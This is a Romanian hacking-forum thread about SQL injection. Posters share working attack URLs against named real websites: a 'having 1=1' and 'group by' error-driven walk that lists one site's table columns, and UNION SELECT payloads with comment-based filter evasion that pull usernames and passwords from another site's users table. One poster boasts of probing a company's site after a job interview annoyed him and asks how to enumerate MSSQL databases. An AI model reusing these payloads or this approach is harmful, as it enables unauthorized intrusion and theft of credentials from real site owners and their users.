Jump to content
michee

Mysql Comments

Recommended Posts

postez aici ca n-am vazut topic special de mysql injection.....este XSS dar nu si asta...

Deci...am gasit un SQL injection intr-un site.....faza e ca

am ceva de genul ....WHERE id=123142 eu inserez un "ORDER BY 20 --"

si rezulta ceva WHERE id=123142 ORDER BY 20 -- GROUP BY alt_id

Faza e ca-mi da o eroare la GROUP BY ....De ce nu merge comentariul -- ??

Stiti alta metoda sa comentez ce urmeaza? adik GROUP BY -ul? Eu n-am gasit.......

Link to comment
Share on other sites

look here kid...un exemplu live pentru tine

http://www.cartel-alfa.ro/navigare.asp?id=77%20having%201=1

testam rapid daca baza de date "scuipa" ceva columns, cu "having 1=1"


Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 'tblNews.News_ID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

Noua tabela aflata o folosim intr-o interogare de tipul "group by", dupa cum urmeaza:

http://www.cartel-alfa.ro/navigare.asp?id=77%20%20group%20by%20tbl.News.News_ID%20having%201=1


Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 'tblNews.News_title' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

a doua tabela aflata, iarasi o folosim intr-o interogare de tipul "group by":

http://www.cartel-alfa.ro/navigare.asp?id=77%20%20group%20by%20tbl.News.News_ID,tblNews.News_title%20having%201=1


Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 'tblNews.News_Date' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

.

.

.

pana se ajunge la ceva de genul:

http://www.cartel-alfa.ro/navigare.asp?id=77%20%20group%20by%20tbl.News.News_ID,tblNews.News_title,tblNews.News_Date,tblNews.Short_news%20having%201=1


Microsoft OLE DB Provider for SQL Server error '80040e14'

The text, ntext, and image data types cannot be compared or sorted, except when using IS NULL or LIKE operator.

Si cam asa se concretizeaza o metoda de aflare a tabelelor, dupa aceea cu informatiile obtinute putandu-se realiza un update, sau alte magarii.

Dar, dupa cum am invatat din experienta, cu sql injections ar cam trebui sa te porti cam cum ar trebui sa te porti cu femeile :))

Adica...ajunge atata vorbarie cu group by...having 1=1-- blabla...u just have to stick it :D

like this:

pass:

http://www.antibiotice.ro/news.php?id=-1/**/UNION/**/ALL/**/SELECT/**/0,1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/users/*

luser:

http://www.antibiotice.ro/news.php?id=-1/**/UNION/**/ALL/**/SELECT/**/0,1,2,username,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/users/*

si cam atat pentru azi...si multe vreme de acu incolo :D

Link to comment
Share on other sites

mda....interviu.......am fost pe la unii la interviu, m-am enervat un pic si am ajuns acasa......si-am inceput sa le iau site-ul la puricat:)

Concluzia e ca era dezastru....si ei ma intrebau pe mine intr-un test daca "Nycole"(cred ca asta iesea dintr-o anagrama) e nume insula,fluviu, oras, ocean sau pm:))

ps: sa revenim la sql injection. Acelasi lucru de mai sus cu HAVING 1=1 il obtineam cu un simplu ' . Acuma pe mysql server iau datele despre toate db-urile si toate tabelele din db-ul INFORMATION_SCHEMA. pe SQL Server-ul ala sau ce era, cum obtin aceste date?

Link to comment
Share on other sites

1)ceylon.....whatever....Who the fuck cares, really? Ce eu m-am dus acolo sa dau test de cultura generala? Eram invitat cumva la "Vrei sa fii miliardar" si nu mi-am dat eu seama?

2)sa ma rog la ce???? De ce???

3)pai ce informatie sa dau? E serverul care ti l-am zis...si practic ma interesa un echivalent al bazei de date information_schema din mysql (daca exista)....a.i. sa aflu date despe alte db-uri, tabele si campuri de pe serverul respectiv.

Link to comment
Share on other sites

Corect...ce iti trebuie tie cultura generala, fuckin' moron

Citeste un tutorial de sql injection daca nu ai prea multa lene in tine, "pai ce informatie sa dau?" da, pai ce informatii din erori poti sa dai, ca doar noi avem imaginatie bogata si ne putem inchipui. Si oricum e bine ca te intereseaza INFORMATION_SCHEMA, cu toate ca nu functioneaza sa o folosesti intotdeauna in interogari.

Link to comment
Share on other sites

Vere...explica-mi si mie relevanta culturii generale ptr un asemenea post.....baietii aia de-acolo nu stiau sa faca un site ANTI-INJECTION si ANTI-XSS.........apropo ei erau vreo 6 eu eram unu singur si culmea ironiei lucrau de vreo 6 ani la portalul ala.

Deci ce ti se mai important? Cine e mai avantajat? Stiau ei ca Ceylon e insula? Foarte bine, ma doare la pula.....i-am facut de tot rahatu practic.

Sa-nvete tot atlasu geografic si ce mai vor ei tot niste terminati sunt.....

Cand am zis ce informatie sa dau ====> Nu era nici o informatie de dat de aia nu am dat.

si inca o data .......MA FUT IN EA DE CULTURA GENERALA daca nu esti in stare sa faci(BINE) lucrul ptr ca esti platit sa-l faci.

Link to comment
Share on other sites

:))....vere......deci ce-am gasit eu acolo erau chestii care puteau fi evitate foarte simplu cu 2 functii de filtrare una ptr XSS si una ptr SQL.....

Eu in site-urile mele am o singura functie de fapt care le face pe amandoua....si o apelez peste tot unde am un GET sau un POST....

Si cu functia asta in mod sigur 90% din atacuri zic eu....

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...